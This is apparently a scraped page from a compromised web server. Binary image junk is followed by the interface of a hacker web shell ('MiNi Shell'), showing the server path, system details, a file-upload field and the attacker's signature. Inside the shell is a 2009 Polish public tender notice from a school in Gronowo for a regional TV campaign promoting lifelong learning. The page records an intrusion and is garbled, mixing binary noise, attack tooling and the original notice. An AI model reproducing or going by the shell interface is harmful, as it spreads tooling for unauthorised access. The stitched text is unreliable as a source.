JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090511/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090511/73859-N-2009.html

<p class="kh_header"><b>Lubicz: przeprowadzenie  kampanii informacyjno-promocyjnej w telewizji o zasięgu regionalnym w ramach projektu pt. Nigdy nie jest za późno na naukę - daj sobie drugą szansę</b><br>
<b>Numer ogłoszenia: 73859 - 2009; data zamieszczenia: 11.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Centrum Kształcenia Ustawicznego w Gronowie , Gronowo 128, 87-162 Lubicz, woj. kujawsko-pomorskie, tel. 056 6784118, -25, -66, faks 056 6784118.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsgronowo.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła ponadgimnazjalna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przeprowadzenie  kampanii informacyjno-promocyjnej w telewizji o zasięgu regionalnym w ramach projektu pt. Nigdy nie jest za późno na naukę - daj sobie drugą szansę.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie kampanii informacyjno-promocyjnej w telewizji o zasięgu regionalnym (pokrycie zasięgiem 100 % województwa kujawsko-pomorskiego) propagującej kształcenie przez całe życie. Kampania polega na przygotowaniu 2 różnych spotów 30 sekundowych oraz ich emisji co najmniej 295 razy. Spoty powinny być emitowane dwa razy dziennie, w dni powszednie, przed programami cechującymi się dużą oglądalnością w godzinach popołudniowych w telewizji regionalnej.
Spoty mają przedstawiać korzyści płynące z uczenia się przez całe życie. Scenariusz 30 sekundowych przykładowych spotów powinien być przekazany w formie pisemnej wraz z formularzem ofertowym. Szczegółowy opis zamówienia:
1.	Charakterystyka projektu
Charakterystyka rynku pracy w ostatnich latach wymaga od potencjalnych pracowników nieustannego podnoszenia kwalifikacji. Cechą charakterystyczną naszego społeczeństwa jest niechęć do nauki w formach szkolnych, przez całe życie. Wiązać się to może 
z niedoinformowaniem społeczeństwa w omawianym obszarze. Osoby aktywne zawodowo, również nie widzą powodów, dla których należy się kształcić przez całe życie. 
1.1	Cele
Celami regionalnej kampanii informacyjno-promocyjnej są:
- uświadomienie mieszkańcom województwa kujawsko - pomorskiego dużego znaczenia podnoszenia i uzupełniania kwalifikacji, 
- przybliżenie korzyści płynących z kształcenia ustawicznego,
- promocja kształcenia przez całe życie (ustawicznego). 
Kampania powinna wpłynąć na przełamywanie stereotypów związanych z kształceniem ustawicznym, skutkować podniesieniem odsetka osób dokształcających się. Powinna przekazywać jasny sygnał - osoby kształcące się ustawicznie mają większą wartość, zarówno na rynku pracy jak i w społeczności lokalnej. 
1.2	Grupa docelowa
Odbiorcami kampanii w telewizji o zasięgu regionalnym są wszyscy mieszkańcy województwa kujawsko - pomorskiego znajdujący się w kręgu osób mogących kształcić się ustawicznie (zasadniczo są to osoby 18+  pracujący, bezrobotni, nieaktywni zawodowo). 
1.3	Zakładane rezultaty
a)	Przygotowanie i wyprodukowanie dwóch zróżnicowanych spotów telewizyjnych po 30 sekund o charakterze informacyjno-promocyjnym w zakresie objętym projektem. Kopie dwóch wyprodukowanych spotów zostaną przekazane Zamawiającemu wraz z prawami autorskimi na kasecie BETACAM oraz płytach CD-R, DVD-R.
b)	Kampania informacyjno-promocyjna ma obejmować emisję co najmniej 295 spotów 
w okresie nie później niż od 25.06.2009r. do 31.01.2010r. 
Emisja spotów musi odbyć się w telewizji regionalnej, która obejmuje swoim zasięgiem 100% terytorium województwa kujawsko - pomorskiego. Kampanie należy przeprowadzić tak, aby dotrzeć do grupy docelowej projektu. 
Spoty telewizyjne powinny być emitowane dwa razy dziennie w dni powszednie przed programami cechującymi się dużą oglądalnością w godzinach popołudniowych. 
c)	Na potwierdzenie wykonania emisji spotów Wykonawca przedstawi raport z wykonania usługi- niezależnej firmy przeprowadzającej monitoring mediów(składanym co najmniej raz na trzy miesiące począwszy od czerwca 2009 r.). W raporcie tym mają znaleźć się informację na temat: liczby wyemitowanych spotów, osiągniętego zasięgu, osiągniętego wskaźnika GRP. Raport ma być sporządzony na podstawie ogólnodostępnych badań. Koszty raportu pokrywa wykonawca.
2.	Przedmiot zamówienia
Przedmiotem zamówienia jest: przeprowadzenie kampanii informacyjno - promocyjnej 
w telewizji o zasięgu regionalnym pt. Nigdy nie jest za późno na naukę - daj sobie drugą szansę. 
Wykonawca przygotuje propozycję zawierającą dwa różne spoty i przedstawi je Zamawiającemu do ostatecznej akceptacji w terminie co najmniej 7 dni przed emisją. Wyłoniony w drodze przetargu Wykonawca odpowiedzialny będzie za przeprowadzenie kampanii w telewizji. 
3.	Termin wykonania zamówienia
Realizacja wszelkich działań objętych zamówieniem(produkcja i emisja) odbywać się będzie od 01.06.2009r. do 31 .01.2010r ( przy czym emisja spotów najpóźniej 25 czerwca 2009r).  Również do dnia 31 stycznia 2010r. do zamawiającego wpłynąć musi końcowy raport o przeprowadzonej kampanii obejmującej cały okres realizacji. 
4.	Dodatkowe informacje
Wykonawca przy realizacji zleconych zadań musi kierować się zapisami umieszczonymi 
w dokumentach Plan komunikacji PO KL oraz Wytyczne dotyczące oznaczania projektów 
w ramach PO KL, których wersja elektroniczna dostępna jest na stronie www.efs.gov.pl ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.34.14.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu 
z postępowania na podst. art. 24 ust.1 i 2  ustawy Pzp i spełniają warunki określone w art. 22 ust. 1 ustawy Pzp:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień udokumentowane odpisem z Krajowego Rejestru Sądowego lub ewidencji działalności gospodarczej
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełniania warunków oparta będzie na zasadzie spełnia/ nie spełnia.
Zamawiający odrzuca ofertę, jeśli zajdą przesłanki, o których mowa w art. 89 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełniania wymaganych przez Zamawiającego warunków Wykonawca zobowiązany jest załączyć do oferty następujące dokumenty i oświadczenia:
1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert,
2. Oświadczenie, że nie podlega wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy Pzp i że spełnia wymagania określone w art. 22 ust. 1 prawo zamówień publicznych - załącznik nr 3 do SIWZ.
Do oferty Wykonawca dołącza, oprócz dokumentów, o których mowa wyżej następujące dokumenty: 
3. Formularz ofertowy - wypełniony załącznik nr 2 do SIWZ
4. Zaparafowany przez Wykonawcę wzór umowy (załącznik nr 4 do SIWZ) jako znak akceptacji warunków, na których Zamawiający zleci wykonanie zamówienia publicznego.
5. Plan emisji spotów.
6. Scenariusz dwóch różnych 30 sekundowych spotów  w formie pisemnej (scenopis)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - wartość merytoryczna - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zsgronowo.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół, Centrum Kształcenia Ustawicznego w Gronowie
Gronowo 128
87-162 Lubicz
pokój nr 204.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2009 godzina 09:00, miejsce: Zespół Szkół, Centrum Kształcenia Ustawicznego w Gronowie
Gronowo 128
87-162 Lubicz
pokój 204.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com